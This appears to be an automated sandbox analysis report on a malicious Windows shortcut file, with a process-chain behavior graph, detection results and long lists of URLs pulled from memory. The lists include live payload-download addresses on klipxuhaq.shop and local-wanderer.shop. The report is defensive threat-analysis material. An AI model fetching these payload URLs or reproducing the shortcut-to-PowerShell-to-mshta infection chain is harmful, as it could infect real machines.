behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576537 Sample: ei0woJS3Dy.lnk Startdate: 17/12/2024 Architecture: WINDOWS Score: 92 54 static.klipxuhaq.shop 2->54 56 x1.i.lencr.org 2->56 58 3 other IPs or domains 2->58 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for URL or domain 2->68 70 Windows shortcut file (LNK) starts blacklisted processes 2->70 72 3 other signatures 2->72 14 sftp.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 19 ssh.exe 2 14->19         started        22 conhost.exe 1 14->22         started        52 127.0.0.1 unknown unknown 16->52 process6 signatures7 74 Windows shortcut file (LNK) starts blacklisted processes 19->74 24 powershell.exe 7 19->24         started        process8 signatures9 80 Windows shortcut file (LNK) starts blacklisted processes 24->80 82 Powershell drops PE file 24->82 27 powershell.exe 7 24->27         started        process10 signatures11 84 Windows shortcut file (LNK) starts blacklisted processes 27->84 30 mshta.exe 16 27->30         started        process12 dnsIp13 64 static.klipxuhaq.shop 104.21.48.1, 443, 49707 CLOUDFLARENETUS United States 30->64 86 Windows shortcut file (LNK) starts blacklisted processes 30->86 88 Suspicious powershell command line found 30->88 34 powershell.exe 17 21 30->34         started        signatures14 process15 dnsIp16 60 qu.ax 188.245.211.225, 443, 49711 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 34->60 62 denek.local-wanderer.shop 172.67.140.151, 443, 49713 CLOUDFLARENETUS United States 34->62 50 C:\Users\user\AppData\Roaming\bdd.exe, PE32+ 34->50 dropped 76 May use the Tor software to hide its network traffic 34->76 39 bdd.exe 3 34->39         started        42 Acrobat.exe 79 34->42         started        44 conhost.exe 34->44         started        file17 signatures18 process19 signatures20 78 Found direct / indirect Syscall (likely to bypass EDR) 39->78 46 AcroCEF.exe 109 42->46         started        process21 process22 48 AcroCEF.exe 6 46->48         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ei0woJS3Dy.lnk11%ReversingLabs
ei0woJS3Dy.lnk7%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\bdd.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://static.klipxuhaq.shop/BUX6P.mp4Qq0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4cC80%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4s0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4W0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4p0%Avira URL Cloudsafe
https://static.k0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4.00%Avira URL Cloudsafe
http://isr.itopupdate.com/check.php0%Avira URL Cloudsafe
https://s3.amazonaws.com/myfilelist/list0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4j0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4...-e0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4l0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4=0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4f0%Avira URL Cloudsafe
https://streams.videolan.org/upload/0%Avira URL Cloudsafe
http://www.borland.com/namespaces/Types0%Avira URL Cloudsafe
https://denek.local-wanderer.shop100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4lN0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4ojrdtj0%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exe100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4O0%Avira URL Cloudsafe
http://denek.local-wanderer.shop100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4...e350%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4C:0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4LMEMP0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp49q0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4H0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp420%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4pehpv0%Avira URL Cloudsafe
https://denek.lo0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4880%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4#0%Avira URL Cloudsafe
http://www.CCAVC.com0%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exep100%Avira URL Cloudmalware
http://www.DelphiFFmpeg.com0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4xeDriverD0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4800%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4$global:?0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4%0%Avira URL Cloudsafe
https://static.kX0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/a0%Avira URL Cloudsafe
http://pyfpdf.googlecode.com/)0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp40%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exe~100%Avira URL Cloudmalware
https://denek.local-wanderer.shopxJ0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4...l340%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4==0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4...0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp4130%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuh0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp40%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    static.klipxuhaq.shop
    104.21.48.1
    truetrue
      unknown
      denek.local-wanderer.shop
      172.67.140.151
      truefalse
        unknown
        qu.ax
        188.245.211.225
        truefalse
          high
          x1.i.lencr.org
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://denek.local-wanderer.shop/bdd.exefalse
            • Avira URL Cloud: malware
            unknown
            https://static.klipxuhaq.shop/BUX6P.mp4true
            • Avira URL Cloud: safe
            unknown
            https://qu.ax/Mcyga.pdffalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://qu.axpowershell.exe, 00000009.00000002.1707322439.0000022234F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://static.klipxuhaq.shop/BUX6P.mp4.0mshta.exe, 00000006.00000003.1964328816.0000021125951000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973504184.0000021125952000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963613386.0000021125944000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1958581219.0000021125944000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1958103572.0000021125944000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://static.klipxuhaq.shop/BUX6P.mp4Qqmshta.exe, 00000006.00000003.1957853761.0000020922C9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://static.kpowershell.exe, 00000005.00000002.1376851534.000002C5AE418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5AE473000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://go.microsoft.copowershell.exe, 00000005.00000002.1378908181.000002C5C612D000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://static.klipxuhaq.shop/BUX6P.mp4cC8mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://isr.itopupdate.com/check.phppowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://s3.amazonaws.com/myfilelist/listpowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://goto.itopupdate.com/appgoto?name=isrpowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://www.microsoft.copowershell.exe, 00000009.00000002.1937029236.000002224B51C000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://static.klipxuhaq.shop/BUX6P.mp4Wmshta.exe, 00000006.00000002.1974902714.000002112A220000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/soap/envelope/bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.9.drfalse
                          high
                          https://goto.itopupdate.com/onlinepowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://static.klipxuhaq.shop/BUX6P.powershell.exe, 00000004.00000002.1384908194.000001E18AC5E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://ip-api.com/powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://static.klipxuhaq.shop/BUX6P.mp4smshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://static.klipxuhaq.shop/BUX6P.mp4ppowershell.exe, 00000005.00000002.1376851534.000002C5AE312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADF71000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://static.klipxuhaq.shop/BUX6P.mp4jmshta.exe, 00000006.00000003.1964217583.0000020922CDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970463678.0000020922CDF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://static.klipxuhaq.shop/BUX6P.mp4lmshta.exe, 00000006.00000002.1970243917.0000020922C49000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://static.klipxuhaq.shop/BUX6P.mp4fmshta.exe, 00000006.00000003.1957853761.0000020922CB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922CB7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://static.klipxuhaq.shop/BUX6P.mp4lNmshta.exe, 00000006.00000003.1959104077.000002112984B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1960406717.0000021129850000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/vs/17/release/vc_redist.x64.exepowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://static.klipxuhaq.shop/BUX6P.mp4...-emshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://static.klipxuhaq.shop/BUX6P.mp4=mshta.exe, 00000006.00000002.1970243917.0000020922C66000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.borland.com/namespaces/Typespowershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://streams.videolan.org/upload/powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.9.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ip-api.com/json/powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://denek.local-wanderer.shoppowershell.exe, 00000009.00000002.1707322439.0000022233779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://static.klipxuhaq.shop/BUX6P.mp4ojrdtjmshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ipinfo.io/bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://static.klipxuhaq.shop/BUX6P.mp4...e35mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://denek.local-wanderer.shoppowershell.exe, 00000009.00000002.1707322439.0000022235050000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://static.klipxuhaq.shop/BUX6P.mp4Opowershell.exe, 00000005.00000002.1376715646.000002C5AC3E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://static.klipxuhaq.shop/BUX6P.mp4LMEMPmshta.exe, 00000006.00000002.1974643766.000002112992F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://static.klipxuhaq.shop/BUX6P.mp4Ppowershell.exe, 00000005.00000002.1376260508.000002C5AC1D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://static.klipxuhaq.shop/BUX6P.mp4xeDriverDmshta.exe, 00000006.00000002.1970743893.0000020922E80000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1384908194.000001E18A7E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.00000222332F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://static.klipxuhaq.shop/BUX6P.mp49qmshta.exe, 00000006.00000003.1957853761.0000020922C9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://static.klipxuhaq.shop/BUX6P.mp4C:powershell.exe, 00000005.00000002.1379311416.000002C5C61E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970243917.0000020922C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://qu.ax/Mcyga.pdf0powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://static.klipxuhaq.shop/BUX6P.mp4Hmshta.exe, 00000006.00000002.1970629876.0000020922E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp480mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://qu.ax/Mcygpowershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://static.klipxuhaq.shop/BUX6P.mp4#mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://static.klipxuhaq.shop/BUX6P.mp488mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.CCAVC.combdd.exe.9.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://denek.lopowershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://qu.ax/Mcpowershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://static.klipxuhaq.shop/BUX6P.mp4pehpvmshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://go.micropowershell.exe, 00000009.00000002.1707322439.0000022234338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.DelphiFFmpeg.combdd.exe.9.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://denek.local-wanderer.shop/bdd.exeppowershell.exe, 00000009.00000002.1707322439.0000022233779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://static.klipxuhaq.shop/BUX6P.mp42powershell.exe, 00000005.00000002.1376771546.000002C5AC410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.ver)svchost.exe, 00000008.00000002.2615696935.00000140E2E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://static.kXpowershell.exe, 00000005.00000002.1376851534.000002C5AE418000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://pyfpdf.googlecode.com/)powershell.exe, 00000009.00000002.1707322439.0000022234F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233775000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4%mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4$global:?powershell.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://denek.local-wanderer.shop/bdd.exe~powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4==mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.klipxuhaq.shop/amshta.exe, 00000006.00000003.1964217583.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1967165870.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970541609.0000020922D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://crl.micropowershell.exe, 00000009.00000002.1942545942.000002224B79C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000008.00000003.1406439123.00000140E307A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                                                      high
                                                                      https://denek.local-wanderer.shopxJpowershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://static.klipxuhaq.shop/mshta.exe, 00000006.00000003.1964217583.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1967165870.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970541609.0000020922D00000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://static.klipxuhaq.shop/BUX6P.mp4...l34mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://ascstats.iobit.com/base-info.phpbdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000008.00000003.1406439123.00000140E3000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                                                          high
                                                                          http://www.info-zip.org/bdd.exe, 00000012.00000002.1820624736.0000000006DCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://static.klipxuhaq.shop/BUX6P.mp4...mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.1384908194.000001E18A76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1384908194.000001E18A7B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.00000222332F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://qu.axpowershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
